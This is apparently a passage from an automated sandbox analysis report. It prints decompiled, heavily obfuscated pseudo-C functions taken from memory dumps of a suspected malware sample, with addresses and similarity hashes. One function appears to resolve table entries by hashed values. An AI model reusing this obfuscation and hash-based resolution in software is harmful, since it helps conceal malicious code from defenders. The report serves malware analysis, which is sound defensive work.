                                                                					_t106 = E003420A0(_t236, _t131, 0xffffffff);
                                                                					_t107 = E003420A0(_t236, 1, 0xffffffff);
                                                                					_t111 = E00343750(_t236,  !(_t107 | _t106), (E00349D50(0x72976c99) | 0x16e36c35) ^ 0xe91c93ca);
                                                                					E00343750(_t236, _v24, 1);
                                                                					_t196 = _t196 + 0x30;
                                                                					_t194 = (_t105 & _t131 | _t104) >> 0x00000001 ^  *0x363e04 ^  *(0x360434 + _t111 * 4);
                                                                					_t237 = _t194;
                                                                					 *0x364194 = 0;
                                                                					 *0x364190 = _t194;
                                                                				}
                                                                				_t49 =  *0x364194; // 0x1
                                                                				_t150 = 0x3637d4[_t49];
                                                                				_t47 = _t49 + 1; // 0x2
                                                                				 *0x364194 = _t47;
                                                                				_t50 = E003420A0(_t237, 0x3637d4[_t49], 0xffffffff);
                                                                				_t51 = E00349D50(0x209e1c2b);
                                                                				E003420A0(_t237, _t150 >> 0xb, _t150);
                                                                				_t57 = E003420A0(_t237, ((_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87) << 0x00000007 & 0x9d2c5680, (_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87);
                                                                				E00349D50(0x8bb200ac);
                                                                				_t60 = E00343750(_t237, E003420A0(_t237, _t57, 0xffffffff), 0x33945623);
                                                                				_t64 = E00342DC0(_t237, _t60, E00343750(_t237, _t57, 0xcc6ba9dc)) ^ _t57 << 0x0000000f & 0xefc60000 ^ 0x33945623;
                                                                				return E003420A0(_t237, _t64, 0xffffffff) & _t64 >> 0x00000012 |  !(_t64 >> 0x12) & _t64;
                                                                			}












































                                                                0x00355bf9
                                                                0x00355c04
                                                                0x00355c09
                                                                0x00355c0c
                                                                0x00355c0e
                                                                0x00355c14
                                                                0x00355c1f
                                                                0x00355c20
                                                                0x00355c30
                                                                0x00355c38
                                                                0x00355c54
                                                                0x00355c74
                                                                0x00355c79
                                                                0x00355ca0
                                                                0x00355ca6
                                                                0x00355ca6
                                                                0x00355ca6
                                                                0x00355caf
                                                                0x00355cb4
                                                                0x00355cbc
                                                                0x00355cc0
                                                                0x00355cc0
                                                                0x00355cca
                                                                0x00355cd2
                                                                0x00355ce6
                                                                0x00355d02
                                                                0x00355d11
                                                                0x00355d14
                                                                0x00355d1e
                                                                0x00355d35
                                                                0x00355d45
                                                                0x00355d4d
                                                                0x00355d93
                                                                0x00355d98
                                                                0x00355da5
                                                                0x00355db0
                                                                0x00355db3
                                                                0x00355dc0
                                                                0x00355dc5
                                                                0x00355dcc
                                                                0x00355dde
                                                                0x00355df7
                                                                0x00355e03
                                                                0x00355e06
                                                                0x00355e0e
                                                                0x00355e16
                                                                0x00355e1f
                                                                0x00355e2a
                                                                0x00355e36
                                                                0x00355e3b
                                                                0x00355e3e
                                                                0x00355e40
                                                                0x00355e40
                                                                0x00355e53
                                                                0x00355e5b
                                                                0x00355e68
                                                                0x00355e72
                                                                0x00355e84
                                                                0x00355e92
                                                                0x00355eb9
                                                                0x00355ec8
                                                                0x00355ecd
                                                                0x00355ed0
                                                                0x00355ed0
                                                                0x00355ed7
                                                                0x00355ee1
                                                                0x00355ee1
                                                                0x00355ee7
                                                                0x00355eec
                                                                0x00355ef3
                                                                0x00355ef6
                                                                0x00355f04
                                                                0x00355f13
                                                                0x00355f31
                                                                0x00355f45
                                                                0x00355f59
                                                                0x00355f72
                                                                0x00355f9c
                                                                0x00355fc2

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c391a2a6bc77c1f18a8b51533835ac4da0053b8e6591e33749aff1bf8002504
                                                                • Instruction ID: fca72f66fd06741381c6cbd90291c76c2bd9eb0c43b38c9588d2ade155540902
                                                                • Opcode Fuzzy Hash: 1c391a2a6bc77c1f18a8b51533835ac4da0053b8e6591e33749aff1bf8002504
                                                                • Instruction Fuzzy Hash: 609107F7D101145BDB02AB74AC4396F79D59B66325B9A0220FC28BF392F9216E14C7A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E00343A30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                				signed int _v20;
                                                                				signed char _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				signed char _t68;
                                                                				signed int _t69;
                                                                				signed int _t72;
                                                                				signed int _t73;
                                                                				signed int _t74;
                                                                				signed int _t76;
                                                                				signed int _t79;
                                                                				signed char _t88;
                                                                				signed int _t95;
                                                                				signed char _t96;
                                                                				signed int _t97;
                                                                				signed int _t98;
                                                                				signed int _t100;
                                                                				signed int _t101;
                                                                				signed int _t109;
                                                                				signed char _t113;
                                                                				signed int _t114;
                                                                				signed int _t133;
                                                                				signed int _t145;
                                                                				signed int _t147;
                                                                				signed char _t156;
                                                                				signed int _t157;
                                                                				signed int _t162;
                                                                				signed int _t163;
                                                                
                                                                				_t97 = _a12;
                                                                				_t68 = (((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) << 6) + ((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) * 2 + 0xd6;
                                                                				_t156 = _t68;
                                                                				_t69 = _t68 * _t97;
                                                                				_t145 = _a8;
                                                                				if((_t68 * _t97 >> 0x00000020 | _t68 ^ _t97) != 0) {
                                                                					_v32 = _t156;
                                                                					_t98 = _a4;
                                                                				} else {
                                                                					_t98 = _a4;
                                                                					_t95 = (_t69 + _t156 & 0x000000ff | _t98) & _a12;
                                                                					_t96 = _t95 - _t98;
                                                                					_v32 = _t96;
                                                                					_t69 = _t95;
                                                                					_v28 = _t96 + _t69;
                                                                				}
                                                                				_v20 = _t69;
                                                                				_t157 = _t69;
                                                                				_t72 = E00349C60(_t98, _t145, _t157, _t157 >> 0x1f);
                                                                				_v24 = 0;
                                                                				if((_t145 ^ _a16 | _t98 ^ _a12) != 0) {
                                                                					_t109 = _a12;
                                                                				} else {
                                                                					_t109 = _a12;
                                                                					if((_t72 & 0x00000001) != 0) {
                                                                						_t88 = _v20 * _v28;
                                                                						_t145 = (_t88 + _t109) * _t157;
                                                                						_v24 = (_t88 & 0x000000ff) + _t145;
                                                                					}
                                                                				}
                                                                				_t73 = _t109;
                                                                				_t74 = _t73 * _t98;
                                                                				_v28 = _t74;
                                                                				_t162 = _a16 * _t98 + _t109 * _a8 + (_t73 * _t98 >> 0x20);
                                                                				_t113 = _v24 + _t145;
                                                                				_v24 = _t113;
                                                                				_t100 = _t113 * _t74;
                                                                				_t76 = E00349D50(0x647420ac) & (_t145 ^ _t100);
                                                                				_t114 = _t76;
                                                                				_t101 = _t100 | _t114;
                                                                				_v20 = _t162;
                                                                				_t147 = _v28;
                                                                				_t163 = _t147;
                                                                				if((_t147 ^ _a12 | _t162 ^ _a16) == 0) {
                                                                					L10:
                                                                					_t101 = _t101 * _t114 + _v24;
                                                                					_t79 = _t163 * _v32;
                                                                					_t133 = _t79 * _t101 >> 0x20;
                                                                					_t76 = (_t79 * _t101 & 0x000000ff) * 0x00000045 | _t101;
                                                                					goto L11;
                                                                				} else {
                                                                					_t133 = _t163;
                                                                					if((_a8 ^ _v20 | _a4 ^ _t133) == 0) {
                                                                						L11:
                                                                						 *0x3620d8 = ((_t133 & _t133 + _t76 & 0x000000ff) + _t76) * _t101;
                                                                						return _t133;
                                                                					}
                                                                					_t163 = _t133;
                                                                					if((_v32 >> 0x0000001f ^ _a16 | _a12 ^ _v32) != 0) {
                                                                						_t133 = _t163;
                                                                						goto L11;
                                                                					}
                                                                					goto L10;
                                                                				}
                                                                			}































                                                                0x00343a39
                                                                0x00343a50
                                                                0x00343a5f
                                                                0x00343a61
                                                                0x00343a65
                                                                0x00343a68
                                                                0x00343a8b
                                                                0x00343a8e
                                                                0x00343a6a
                                                                0x00343a71
                                                                0x00343a76
                                                                0x00343a7b
                                                                0x00343a7d
                                                                0x00343a82
                                                                0x00343a86
                                                                0x00343a86
                                                                0x00343a91
                                                                0x00343a94
                                                                0x00343aa0
                                                                0x00343ab2
                                                                0x00343abb
                                                                0x00343ae0
                                                                0x00343abd
                                                                0x00343ac0
                                                                0x00343ac3
                                                                0x00343ac8
                                                                0x00343ad0
                                                                0x00343adb
                                                                0x00343adb
                                                                0x00343ac3
                                                                0x00343ae3
                                                                0x00343ae5
                                                                0x00343ae9
                                                                0x00343afa
                                                                0x00343aff
                                                                0x00343b01
                                                                0x00343b07
                                                                0x00343b19
                                                                0x00343b1b
                                                                0x00343b1e
                                                                0x00343b20
                                                                0x00343b28
                                                                0x00343b2b
                                                                0x00343b32
                                                                0x00343b5c
                                                                0x00343b63
                                                                0x00343b69
                                                                0x00343b6c
                                                                0x00343b77
                                                                0x00000000
                                                                0x00343b34
                                                                0x00343b34
                                                                0x00343b45
                                                                0x00343b79
                                                                0x00343b8c
                                                                0x00343b9d
                                                                0x00343b9d
                                                                0x00343b47
                                                                0x00343b5a
                                                                0x00343b9e
                                                                0x00000000
                                                                0x00343b9e
                                                                0x00000000
                                                                0x00343b5a

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f994f6511aaaa9b8a0310343631688b88cdf2f7676cb0638ac33fefaf1eca96
                                                                • Instruction ID: 09a04dca2302aee80f3060a8fdfc499bf5880b51e8907b2a72f953e33d65469b
                                                                • Opcode Fuzzy Hash: 4f994f6511aaaa9b8a0310343631688b88cdf2f7676cb0638ac33fefaf1eca96
                                                                • Instruction Fuzzy Hash: 7541A872F001294B9F09CE59CCD25FFB7EAEBD8310B15802AE855EB351D574AE068BE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 95%
                                                                			E00349A60(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                				signed int _v20;
                                                                				signed char _v24;
                                                                				signed int _t41;
                                                                				signed char _t42;
                                                                				signed int _t43;
                                                                				signed char _t45;
                                                                				signed int _t50;
                                                                				signed int _t54;
                                                                				signed int _t55;
                                                                				signed char _t59;
                                                                				signed int _t61;
                                                                				signed char _t66;
                                                                				signed int _t67;
                                                                				signed int _t68;
                                                                				signed char _t71;
                                                                				signed int _t78;
                                                                				signed char _t83;
                                                                				signed char _t85;
                                                                				signed int _t86;
                                                                				signed int _t94;
                                                                				signed int _t105;
                                                                				signed int _t116;
                                                                
                                                                				_t105 = _a4;
                                                                				_t59 = (_t105 ^ 0x000000f5) - _t105;
                                                                				_t41 = E00347DD0(0xa4) & _t59;
                                                                				_t78 = _t41 * _t59 >> 0x20;
                                                                				_t42 = _t41 * _t59;
                                                                				_t68 = _t42;
                                                                				_t61 = _t42 & _t105;
                                                                				_t43 = _a8;
                                                                				asm("sbb eax, [ebp+0x14]");
                                                                				if(_t105 < _a12) {
                                                                					_t55 = _t68 + _t61;
                                                                					_t78 = _t55 * _t78 >> 0x20;
                                                                					_t68 = _t55 * _t78;
                                                                					_t43 = _t68;
                                                                					_v20 = _t43;
                                                                					_t61 = 0;
                                                                				}
                                                                				if((_t68 >> 0x0000001f ^ _a8 | _t68 ^ _t78) == 0) {
                                                                					_t94 = _a12;
                                                                				} else {
                                                                					_t94 = _a12;
                                                                					if((_t68 >> 0x0000001f ^ _a16 | _t68 ^ _t94) != 0) {
                                                                						_t54 = _v20;
                                                                						_t67 = _t61 & _t54 * _t94;
                                                                						_t43 = _t54 + _t67 + 0xe;
                                                                						_t68 = _t67;
                                                                					}
                                                                				}
                                                                				_v24 = 0;
                                                                				if((_a8 ^ _a16 | _a4 ^ _t94) != 0) {
                                                                					_v24 = 0x1cb;
                                                                				}
                                                                				_t83 = _t43 ^ _v20;
                                                                				_t45 = _t68 & _t83;
                                                                				_t66 = _t45 + 0xfffffefa;
                                                                				if((_t83 >> 0x0000001f ^ _a8 | _t83 ^ _a4) != 0 || (_t66 >> 0x0000001f ^ _a8 | _t66 ^ _a4) != 0) {
                                                                					_t71 = (_t68 ^ _t68 ^ _t66) + _t83;
                                                                					_t83 = _t71;
                                                                					_t68 = _t45 + (_t71 + _t66 & _t45) + (_t71 + _t66 & _t45);
                                                                				}
                                                                				_v20 = _t83;
                                                                				_t116 = _t83;
                                                                				if((_a16 ^ _t116 >> 0x0000001f | _a12 ^ _t116) == 0) {
                                                                					L14:
                                                                					_t50 = (_t68 ^ _v20) - _t66;
                                                                					_t85 = _v24;
                                                                					_t86 = _t50 * _t85 >> 0x20;
                                                                					_t68 = _t50 * _t85;
                                                                					goto L15;
                                                                				} else {
                                                                					asm("sbb eax, edi");
                                                                					if(_t116 >= _a4) {
                                                                						goto L14;
                                                                					}
                                                                					_t86 = _v24;
                                                                					L15:
                                                                					 *0x362098 = _t68;
                                                                					return _t86;
                                                                				}
                                                                			}

























                                                                0x00349a6c
                                                                0x00349a77
                                                                0x00349a88
                                                                0x00349a8a
                                                                0x00349a8a
                                                                0x00349a8c
                                                                0x00349a91
                                                                0x00349a96
                                                                0x00349a98
                                                                0x00349a9b
                                                                0x00349a9f
                                                                0x00349aa1
                                                                0x00349aa3
                                                                0x00349aa5
                                                                0x00349aa8
                                                                0x00349aab
                                                                0x00349aab
                                                                0x00349ac0
                                                                0x00349aeb
                                                                0x00349ac2
                                                                0x00349aca
                                                                0x00349ad4
                                                                0x00349ad6
                                                                0x00349ade
                                                                0x00349ae3
                                                                0x00349ae7
                                                                0x00349ae7
                                                                0x00349ad4
                                                                0x00349afb
                                                                0x00349b04
                                                                0x00349b06
                                                                0x00349b06
                                                                0x00349b0f
                                                                0x00349b14
                                                                0x00349b19
                                                                0x00349b2f
                                                                0x00349b46
                                                                0x00349b48
                                                                0x00349b52
                                                                0x00349b52
                                                                0x00349b57
                                                                0x00349b5a
                                                                0x00349b70
                                                                0x00349b7e
                                                                0x00349b83
                                                                0x00349b85
                                                                0x00349b88
                                                                0x00349b8a
                                                                0x00000000
                                                                0x00349b72
                                                                0x00349b75
                                                                0x00349b77
                                                                0x00000000
                                                                0x00000000
                                                                0x00349b79
                                                                0x00349b8c
                                                                0x00349b8f
                                                                0x00349b9d
                                                                0x00349b9d

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 973747e83ae1df6707eb0910d9a5cebe9e7174249d700df76c670403552073a2
                                                                • Instruction ID: 16bce5cd84d084825a69ec5fdc7a35faebdc04f2384fec2b45b11c0165799cb3
                                                                • Opcode Fuzzy Hash: 973747e83ae1df6707eb0910d9a5cebe9e7174249d700df76c670403552073a2
                                                                • Instruction Fuzzy Hash: 7B417133A405294B9B11CE6998911EFB3E6EFD8320B2A8526DC58BF744D630BD068BD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E00358830(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                				intOrPtr _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _t26;
                                                                				intOrPtr* _t28;
                                                                				void* _t34;
                                                                				void* _t42;
                                                                				signed short _t45;
                                                                				signed int _t51;
                                                                				signed int _t54;
                                                                				signed int _t55;
                                                                				signed int _t57;
                                                                				intOrPtr* _t61;
                                                                				intOrPtr* _t62;
                                                                				void* _t63;
                                                                				signed short _t66;
                                                                				void* _t67;
                                                                				void* _t68;
                                                                				void* _t69;
                                                                				void* _t73;
                                                                				intOrPtr* _t79;
                                                                				intOrPtr _t81;
                                                                
                                                                				_t26 = E003500D0(_a8);
                                                                				_t68 = _t67 + 4;
                                                                				_t76 = _t26;
                                                                				_v32 = _t26;
                                                                				if(_t26 == 0) {
                                                                					L6:
                                                                					return 0;
                                                                				}
                                                                				_t48 = _a4;
                                                                				_t28 = E00359180(_t76, _a4);
                                                                				_t69 = _t68 + 4;
                                                                				_t61 = _t28;
                                                                				if(_t61 != 0) {
                                                                					if( *_t61 == 0) {
                                                                						goto L6;
                                                                					}
                                                                					_t62 = _t61 + 0x14;
                                                                					_t79 = _t62;
                                                                					while(1) {
                                                                						_t34 = E0034ACF0(E00341460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2, _t79, _a8, E00341460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2);
                                                                						_t69 = _t69 + 0x10;
                                                                						if(_t34 == 0) {
                                                                							break;
                                                                						}
                                                                						_t81 =  *_t62;
                                                                						_t62 = _t62 + 0x14;
                                                                						if(_t81 != 0) {
                                                                							continue;
                                                                						}
                                                                						goto L6;
                                                                					}
                                                                					_t51 =  ~(E00341460(__eflags, E003422E0(__eflags, 0,  *((intOrPtr*)(_t62 - 0x14))),  ~_t48));
                                                                					E00341460(__eflags,  *((intOrPtr*)(_t62 - 0x14)), _a4);
                                                                					_t73 = _t69 + 0x18;
                                                                					_t66 =  *_t51;
                                                                					_v28 = _t51;
                                                                					__eflags = _t66;
                                                                					if(_t66 == 0) {
                                                                						L12:
                                                                						return 1;
                                                                					}
                                                                					_t54 = _a4;
                                                                					_t63 = 0;
                                                                					_t55 = _t54 + 0xd8be785;
                                                                					__eflags = _t55;
                                                                					_v24 = _t55;
                                                                					_v20 =  *((intOrPtr*)(_t62 - 4)) + _t54;
                                                                					while(1) {
                                                                						E00343750(__eflags, _t66, 0xffff);
                                                                						_t42 = E00349D50(0x960018d7);
                                                                						__eflags = _t66;
                                                                						_t57 = _v24 + _t66;
                                                                						_t44 =  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2;
                                                                						_t45 = E00356B30(_t66, _v32,  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2);
                                                                						_t73 = _t73 + 0x14;
                                                                						__eflags = _t45;
                                                                						_t55 = (_t57 & 0xffffff00 | _t45 != 0x00000000) & _t55;
                                                                						__eflags = _t45;
                                                                						 *(_v20 + _t63) = _t45;
                                                                						if(_t45 == 0) {
                                                                							break;
                                                                						}
                                                                						_t66 =  *(_v28 + _t63 + 4);
                                                                						_t63 = _t63 + 4;
                                                                						__eflags = _t66;
                                                                						if(__eflags != 0) {
                                                                							continue;
                                                                						}
                                                                						goto L12;
                                                                					}
                                                                					return _t55;
                                                                				}
                                                                				return 1;
                                                                			}


























                                                                0x0035883c
                                                                0x00358841
                                                                0x00358844
                                                                0x00358846
                                                                0x00358849
                                                                0x0035889c
                                                                0x00000000
                                                                0x0035889c
                                                                0x0035884b
                                                                0x0035884f
                                                                0x00358854
                                                                0x00358857
                                                                0x0035885d
                                                                0x00358862
                                                                0x00000000
                                                                0x00000000
                                                                0x00358864
                                                                0x00358864
                                                                0x00358870
                                                                0x00358888
                                                                0x0035888d
                                                                0x00358892
                                                                0x00000000
                                                                0x00000000
                                                                0x00358894
                                                                0x00358897
                                                                0x0035889a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0035889a
                                                                0x003588c2
                                                                0x003588c8
                                                                0x003588cd
                                                                0x003588d0
                                                                0x003588d2
                                                                0x003588d5
                                                                0x003588d7
                                                                0x0035894a
                                                                0x00000000
                                                                0x0035894a
                                                                0x003588dc
                                                                0x003588df
                                                                0x003588e3
                                                                0x003588e3
                                                                0x003588e9
                                                                0x003588ec
                                                                0x003588f0
                                                                0x003588f8
                                                                0x00358905
                                                                0x00358910
                                                                0x00358915
                                                                0x0035891c
                                                                0x00358923
                                                                0x00358928
                                                                0x0035892e
                                                                0x00358933
                                                                0x00358935
                                                                0x00358937
                                                                0x0035893a
                                                                0x00000000
                                                                0x00000000
                                                                0x0035893f
                                                                0x00358943
                                                                0x00358946
                                                                0x00358948
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00358948
                                                                0x00000000
                                                                0x00358951
                                                                0x003588a5

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
                                                                • Instruction ID: 90426f9e41fb8a81092289543ec577d4a0627fe82d7de89fbdf5ba0015ddc725
                                                                • Opcode Fuzzy Hash: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
                                                                • Instruction Fuzzy Hash: 1031C7B6E001169BDB129B64DC42EBA77A8EF41319F450024ED08BF352EB31ED15C7A1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 93%
                                                                			E00349C60(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                				signed char _v17;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				signed int _t35;
                                                                				signed int _t36;
                                                                				signed int _t38;
                                                                				signed int _t42;
                                                                				signed int _t44;
                                                                				signed char _t45;
                                                                				signed int _t49;
                                                                				signed char _t51;
                                                                				signed int _t53;
                                                                				signed int _t56;
                                                                				signed int _t57;
                                                                				signed int _t60;
                                                                				signed int _t75;
                                                                				signed int _t76;
                                                                				signed int _t88;
                                                                				signed int _t94;
                                                                				signed int _t95;
                                                                
                                                                				_t95 = _a12;
                                                                				_t35 = _a4 * 0xffffffa5 * _t95;
                                                                				_t53 = _t35 - _t95;
                                                                				_t49 = 0;
                                                                				if((_t35 >> 0x0000001f ^ _a16 | _t35 ^ _t95) != 0) {
                                                                					_t36 = _a4;
                                                                					_t75 =  !_t95 & (_t53 | _t35) + _t36;
                                                                					_t38 = _t75 * 0x73;
                                                                					_t53 = _t75;
                                                                					_t76 = _t36;
                                                                				} else {
                                                                					_t38 = 0;
                                                                					_t76 = _a4;
                                                                				}
                                                                				asm("sbb edx, [ebp+0xc]");
                                                                				if(_t95 >= _t76) {
                                                                					_t49 = 0x3a1;
                                                                				}
                                                                				_t56 = _t53;
                                                                				_t94 = (_t38 & _t95 ^ _t49) * _t56 * 0x77;
                                                                				_t57 = _t56 ^ _t94;
                                                                				_t42 = _t49;
                                                                				_v24 = _t57;
                                                                				_v32 = _t42;
                                                                				_t51 = _t57 * _t42;
                                                                				_t44 = E00347DD0(0xc5) * _t51;
                                                                				_v17 = _t44;
                                                                				_v28 = _t94;
                                                                				_t45 = _t44 * _t94;
                                                                				_t60 = _a8;
                                                                				asm("sbb edx, ecx");
                                                                				if(_t51 >= _a4) {
                                                                					L8:
                                                                					_t88 = (_v24 + _t45 * _a4 - _t45 * _a4 ^ _v28) + _t45 * _a4 ^ _v17;
                                                                				} else {
                                                                					_t88 = _t60 ^ _a16 | _t95 ^ _a4;
                                                                					if(_t88 == 0 || (_t51 >> 0x0000001f ^ _a16 | _t95 ^ _t51) != 0) {
                                                                						goto L8;
                                                                					}
                                                                				}
                                                                				 *0x362100 = _t88;
                                                                				return _v32;
                                                                			}
























                                                                0x00349c69
                                                                0x00349c73
                                                                0x00349c7c
                                                                0x00349c85
                                                                0x00349c89
                                                                0x00349c94
                                                                0x00349c9f
                                                                0x00349ca4
                                                                0x00349ca7
                                                                0x00349ca9
                                                                0x00349c8b
                                                                0x00349c8b
                                                                0x00349c8d
                                                                0x00349c8d
                                                                0x00349cb0
                                                                0x00349cb3
                                                                0x00349cb5
                                                                0x00349cb5
                                                                0x00349cbe
                                                                0x00349cc4
                                                                0x00349cc7
                                                                0x00349cc9
                                                                0x00349ccb
                                                                0x00349cd0
                                                                0x00349cd3
                                                                0x00349ce3
                                                                0x00349ce5
                                                                0x00349cea
                                                                0x00349ced
                                                                0x00349cfa
                                                                0x00349cfd
                                                                0x00349cff
                                                                0x00349d1e
                                                                0x00349d38
                                                                0x00349d01
                                                                0x00349d0b
                                                                0x00349d0d
                                                                0x00000000
                                                                0x00000000
                                                                0x00349d0d
                                                                0x00349d3a
                                                                0x00349d4a

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc9947936c036c9d31e10836a3c74363f2ba007e85e23f3f628ff9583f5251b4
                                                                • Instruction ID: 11def063553ac08c79100b92570eccb33904e057377b12744cea045bf03543b0
                                                                • Opcode Fuzzy Hash: bc9947936c036c9d31e10836a3c74363f2ba007e85e23f3f628ff9583f5251b4
                                                                • Instruction Fuzzy Hash: 2931C531F000195B9B0DCE6DD8D26BFBBEBABC4301B15C12FE809DB658D970A9068780
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154811947.0000000000420000.00000040.00020000.sdmp, Offset: 00420000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                • Instruction ID: 00d4a395921330f8c16274f2e2d6e0486e5e85b4d83f3999c17d4ebbb8404489
                                                                • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                • Instruction Fuzzy Hash: 001184733402109FD714DE55EC81FA3B3DAEB983307698166ED04CB316D679E842C7A4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154811947.0000000000420000.00000040.00020000.sdmp, Offset: 00420000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                • Instruction ID: d7a24bdd7f843ddb6e2bfd7531e9b0c40cc051a2f08549bb8691241431013940
                                                                • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                • Instruction Fuzzy Hash: 2201D2B33052108FD71CCF2AE884D7ABBE8EBC1320B99817FC54687717D128E846C528
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0035CE40(short* _a4, intOrPtr _a8) {
                                                                				void* _t8;
                                                                				short* _t9;
                                                                				intOrPtr _t10;
                                                                				short* _t11;
                                                                				void* _t12;
                                                                
                                                                				_t10 = _a8;
                                                                				_t11 = _a4;
                                                                				if(_t10 != 0) {
                                                                					_t11 = _t11 + 2;
                                                                					_t9 = 0;
                                                                					while( *((short*)(_t11 - 2)) != 0) {
                                                                						L3:
                                                                						_t11 = _t11 + 2;
                                                                					}
                                                                					if( *_t11 == 0) {
                                                                						_t11 = 0;
                                                                					} else {
                                                                						_t8 = E00349D50(0x1e99166a);
                                                                						_t12 = _t12 + 4;
                                                                						_t9 = _t9 + _t8 - 0x7aed16c5;
                                                                						if(_t9 != _t10) {
                                                                							goto L3;
                                                                						} else {
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t11;
                                                                			}








                                                                0x0035ce46
                                                                0x0035ce49
                                                                0x0035ce4e
                                                                0x0035ce50
                                                                0x0035ce53
                                                                0x0035ce5a
                                                                0x0035ce60
                                                                0x0035ce60
                                                                0x0035ce63
                                                                0x0035ce6e
                                                                0x0035ce8a
                                                                0x0035ce70
                                                                0x0035ce75
                                                                0x0035ce7a
                                                                0x0035ce7d
                                                                0x0035ce86
                                                                0x00000000
                                                                0x00000000
                                                                0x0035ce88
                                                                0x0035ce86
                                                                0x0035ce6e
                                                                0x0035ce92

